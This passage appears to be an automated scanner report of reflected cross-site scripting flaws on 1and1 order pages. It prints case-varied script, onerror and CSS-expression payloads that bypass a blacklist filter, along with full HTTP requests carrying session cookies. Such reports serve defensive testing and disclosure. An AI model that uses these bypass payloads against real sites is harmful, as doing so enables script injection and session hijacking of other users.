This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingPhotogallery is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingPhotogallery. The payload 99bea</ScRiPt%20>57d930332ed was submitted in the REST URL parameter 3. This input was returned as 99bea</ScRiPt >57d930332ed in a subsequent request for the URL /xml/order/FeatureSite-buildingPhotogallery.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingPhotogallery99bea</ScRiPt%20>57d930332ed;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingWsb is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingWsb. The payload 8a254</ScRiPt%20>517ec0551f8 was submitted in the REST URL parameter 3. This input was returned as 8a254</ScRiPt >517ec0551f8 in a subsequent request for the URL /xml/order/FeatureSite-buildingWsb.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureSite-buildingWsb8a254</ScRiPt%20>517ec0551f8;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Gtc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Gtc. The payload c5e5c</ScRiPt%20>78e706dc8a4 was submitted in the REST URL parameter 3. This input was returned as c5e5c</ScRiPt >78e706dc8a4 in a subsequent request for the URL /xml/order/Gtc.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Gtcc5e5c</ScRiPt%20>78e706dc8a4;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.tandc HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload 92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d was submitted in the REST URL parameter 3. This input was returned as 92d59</ScRiPt ><ScRiPt>alert(1)</ScRiPt>89b6bbee8d in a subsequent request for the URL /xml/order/Home.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Home92d59</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>89b6bbee8d;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
Request 2
GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=
The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.
